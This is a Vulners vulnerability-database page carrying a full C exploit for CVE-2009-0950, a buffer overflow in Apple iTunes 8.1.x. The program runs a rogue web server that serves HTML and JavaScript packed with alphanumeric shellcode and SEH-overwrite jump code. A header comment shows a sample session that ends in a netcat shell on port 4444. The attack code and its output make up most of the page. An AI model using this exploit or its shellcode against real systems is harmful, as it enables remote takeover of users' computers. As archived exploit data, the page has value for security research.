Vulners
Lucene search
Apple iTunes 8.1.x - 'daap' Remote Buffer Overflow
| Reporter | Title | Published | Views | Family All 34 |
|---|---|---|---|---|
 | Apple iTunes 8.1.x (daap) Buffer overflow remote exploit | 14 Jan 201000:00 | – | zdt |
| Apple iTunes 8.1.1 (ITMS) Multiple Protocol Handler BOF Exploit (meta) | 3 Jun 200900:00 | – | zdt |
| Apple iTunes 8.1.1.10 (itms/itcp) Remote Buffer Overflow Exploit (win) | 12 Jun 200900:00 | – | zdt |
 | iTunes < 8.2 Remote Overflow | 18 Aug 200400:00 | – | nessus |
| Apple iTunes < 8.2 itms: URI Handling Overflow (credentialed check) | 2 Jun 200900:00 | – | nessus |
| Apple iTunes < 8.2 itms: URI Handling Overflow (uncredentialed check) | 2 Jun 200900:00 | – | nessus |
| iTunes < 8.2 itms: URL Stack Overflow (Mac OS X) | 2 Jun 200900:00 | – | nessus |
 | CVE-2009-0950 | 3 Jun 200900:00 | – | circl |
 | Apple iTunes Protocol Handler Stack Buffer Overflow (CVE-2009-0950) | 1 Feb 201000:00 | – | checkpoint_advisories |
 | CVE-2009-0950 | 2 Jun 200918:00 | – | cve |
10
/* iTunes-CVE09-s36.c
*
* Apple iTunes 8.1.x (daap) Buffer overflow remote exploit (CVE-2009-0950)
*
* Coded By :
* .:: [ Simo36 ] ::.
*
* Contact : [email protected]
* [email protected]
*
* Home : www.sec-r1z.com
*
* Tested on : Win XP SP/SP3 Frensh , Win2k pro SP4 english
*
* Thanks To : Ryujin & Stack & r1z
*
* finally I want to thanks mr ryujin for printable shellcode and jump back .
*
*----------------------------------------------------------
* C:\Documents and Settings\Administrateur\Bureau\exploit>iTunes-CVE09-s36..exe
*
* [+] Apple iTunes 8.1.x Buffer overflow remote exploit CVE-2009-0950
*
* [+] By : Simo36 & His0k4 ( [email protected] )
*
* [+] Home : www.sec-r1z.com
* [+] Listen on port 80
*
* [+] Connection accepted from 127.0.0.1:1097
*
* [x] Sendin welcome information....Done
*
* [+] sending the evil packet ...[+] Done !
*
* [+] check port 4444 with netcat
*
* [+] Connection Closed
*
*
*
*----------------------------------------------------------------
* C:\Documents and Settings\Administrateur\Bureau\exploit>nc -v 196.217.232.130 4444
* sweet-9fc9abcd4 [196.217.232.130] 4444 (?) open
* Windows XP Sweet 5.1 [SP3 v5.1.2600]
*(C) Copyright 1985-2001 Microsoft Corp.
*
* C:\Program Files\Mozilla Firefox>
*
*
*
*
*
*
* Note : This vulnerability can't be exploited with simply return address Because
* it is affected with GS Flag .
*
* Compiler : Dev-C++ & mingw
*
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <windows.h>
#include <winsock2.h>
#pragma comment(lib, "ws2_32")
#define Max_BUFF 2037
#define PORT 80
char header1[]=
"<html>\n"
" <head><title>iTunes Remote Exploit</title>\n"
" <script>\n"
" function openiTunes(){document.location.assign('itms://itunes.apple.com/');}\n"
" function prepareStack(){document.location.assign('";
char header2[]=
"');}\n function ownSeh(){document.location.assign('";
char header3[]=
"');}\n function ipwn(){\n"
" prepareStack();\n ownSeh();\n }"
"\n function main() {\n openiTunes(); \n"
" setTimeout('ipwn()',20000);\n }\n";
char header4[]=
" </script>\n"
" </head>\n"
"<body onload='main();'>\n"
"<html>\n"
"<head>\n"
" <title></title>\n"
"</head>\n"
"<body style='color: rgb(0, 0, 0);' onload='main();'\n"
" alink='#ee0000' link='#0000ee' vlink='#551a8b'>\n"
"<p align='center'><b>Apple iTunes 8.1.1.10 (daap)\n"
"BOF remote exploit </b></p>\n"
"<p align='center'><a\n"
" href='http://dvlabs.tippingpoint.com/advisory/TPTI-09-03'><b>\n"
"CVE-2009-0950</b></a>\n"
"</p>\n"
"<p align='center'><span style='font-weight: bold;'>Exploited\n"
"by : Simo36 { Overflows [AT] Hotmail [DOT] com }</span></p>\n"
"<p align='center'><span style='font-weight: bold;'></span></p>\n"
"<p align='center'><b>www.sec-r1z.com</b></p>\n"
"<p align='center'>based on the code found by Matteo\n"
"Memelli <br>\n"
"</p>\n"
"<h2 align='center'><b><u>This exploit works if\n"
"opened from Firefox only!</u></b>\n"
"</h2>\n"
"<p align='center'>\n"
"After exploitation iTunes crashes, you need to kill it from TaskManager\n"
"<br>\n"
"have fun!</p>\n"
"<p align='center'><br>\n"
"</p>\n"
"<p></p>\n"
"</body>\n"
"</html>\n";
// printable shellcode via EDX
unsigned char shellcode[]=
"VVVVVVVVVVVVVVVVV7RYjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIOqhDahIoS0"
"5QnaJLS1uQVaeQcdcm2ePESuW5susuPEsuilazJKRmixHykOkOKOCPLKPlUtu"
"tnkRegLLKSLfepx31zOlK2o7hlKqOEpWqZK3ylKwDLKeQHndqo0j9llOt9P3D"
"uW9Q8J4MWqkrJKkDukPTWTq845M5LKQOq4VajKcVLKTLPKlKQOUL6ajK336LL"
"KMY0lWTwle1O3TqiK2DLKaSFPLKQPVllK0p7lLmlK3pUXQNU8LNbnvnjL0PkO"
"8V2Fv3U61xds02U8RWpsVRqO649on0PhjkZMYlekpPKOKfsoMYkUpfna8mgxV"
"b65RJuRIoHPPhHYFiL5lmBwkOzvpSPSV3F3bsg3BsSsScIohPsVRHR1sl2Fcc"
"k9M1nuphOT6zppIWrwKO8VcZ6ppQv5KO8PBHmtNMvNm9QGKON6aCqEkOZpbHZ"
"EbiNfRiSgioiFRpf40TseiohPLSu8KWD9kvPyf7YoxVqEKOxPu6sZpd3VSX1s"
"0mK98ecZRpv9Q9ZlMYkWqzpDmYxbTqO0KCoZKNaRVMkN3r6LJ3NmpzFXNKNKL"
"ksX0rkNls5FkOrURdioXVSk67PRPQsapQCZgqbq0QSesaKOxPaxNMZyEUjnCc"
"KOn6qzKOkOtwKOJpNk67YlMSKtcTyozvrryozp0hXoZnYp1p0SkOXVKOHPA";
// ascii printable jump code (alpha2)
char jump_code[]= "\x55\x59\x43\x43\x43\x43\x43\x43\x49\x49\x49\x49\x49\x49\x49\x49"
"\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41"
"\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41"
"\x42\x75\x4a\x49\x5a\x49\x45\x35\x6a\x5a\x4b\x4f\x4b\x4f\x41";
// pop EDX from Stack and Incrasing it
char align_stack[]= "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x54\x5a\x42\x42\x42\x42\x42\x42\x56\x56\x56\x56\x56\x56\x56"//
"\x56\x56\x56";
int main(void){
struct sockaddr_in server,client;
FILE *p;
WSADATA wsa;
SOCKET sock1,sock2;
int res;
char sdinfo[]="200\n\r";
char szRecvBuff[0x100];
char url2[Max_BUFF];
char url1[210];
char payload[7000];
int i=0;
system("cls");
printf("\n[+] Apple iTunes 8.1.x Buffer overflow remote exploit CVE-2009-0950\n\n");
printf("[+] By : \t\tSimo36 & His0k4 ( [email protected] ) \n\n");
printf("[+] Home :\t\t www.sec-r1z.com\n");
if(WSAStartup(MAKEWORD(1 ,1),&wsa) !=0){
printf("[-] WSAStartup error:%d\n", WSAGetLastError());
return;
}
sock1 = socket(AF_INET,SOCK_STREAM,0);
server.sin_family = AF_INET;
server.sin_port= htons(PORT);
server.sin_addr.s_addr=0;
res = bind(sock1,(struct sockaddr *)&server ,sizeof(server));
res = listen(sock1, 100);
printf("[+] Listen on port 80 \n\n");
while(1){
res = sizeof(client);
sock2 = accept(sock1, (struct sockaddr *)&client, &res);
printf("[+] Connection accepted from %s:%d\n\n",
inet_ntoa(client.sin_addr), ntohs(client.sin_port));
printf("[x] Sendin welcome information....");
if(send(sock2,sdinfo,strlen(sdinfo),0) !=-1){
Sleep(1000);
printf("Done\n");
res = recv(sock2, szRecvBuff, sizeof(szRecvBuff), 0);
res=recv(sock2,sdinfo,strlen(sdinfo),0);
szRecvBuff[res-1] = '\x0';
/**** ITMS URL ****/
memset(url1,0x41,strlen(url1));
strcpy(&url1[0],"itms://:");
memset(&url1[8],0x42,200);
strcpy(&url1[208],"/");
// Second url
memset(url2,0x42,strlen(url2));
strcpy(&url2[0],"daap://:");
// some padd
memset(&url2[8],0x41,425);
// align with push esp and pop edx
strcpy(&url2[433],align_stack);
// Shellcode Ready !
strcpy(&url2[496],shellcode);
memset(&url2[1226],0x41,570);
strcpy(&url2[1796],"\x61\x45\x45\x45");
strcpy(&url2[1800],"\x2a\x5e\x21\x67");// Thanks Riyujin for this
strcpy(&url2[1804],"DEEEEEEE");
strcpy(&url2[1812],jump_code);
memset(&url2[1875],0x43,161);
strcpy(&url2[2036],"C");
// building exploit
memset(payload,0x41,7000);
strcpy(&payload[0],header1);
// evil packet is ready now :)
strcpy(&payload[strlen(header1)],url1);
strcpy(&payload[strlen(header1)+strlen(url1)],header2);
strcpy(&payload[strlen(header1)+strlen(url1)+strlen(header2)],url2);
strcpy(&payload[strlen(header1)+strlen(url1)+strlen(header2)+strlen(url2)],header3);
strcpy(&payload[strlen(header1)
+strlen(url1)+strlen(header2)+strlen(url2)+strlen(header3)],header4);
printf("\n[+] sending the evil packet ...");
if(send(sock2,payload,strlen(payload),0) !=-1){
res=recv(sock2,payload,strlen(payload),0);
sleep(100);
closesocket(sock2);
printf("[+] Done ! \n\n");
printf("[+] check port 4444 with netcat \n\n");
printf("[+] Connection Closed\n\n");
}else printf ("[-] Error on sending payload !");
}else printf("Error\n");
exit(0);
}
WSACleanup();
return 0x0;
}Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
14 Jan 2010 00:00Current
6.4Medium risk
Vulners AI Score6.4
CVSS 29.3
EPSS0.82109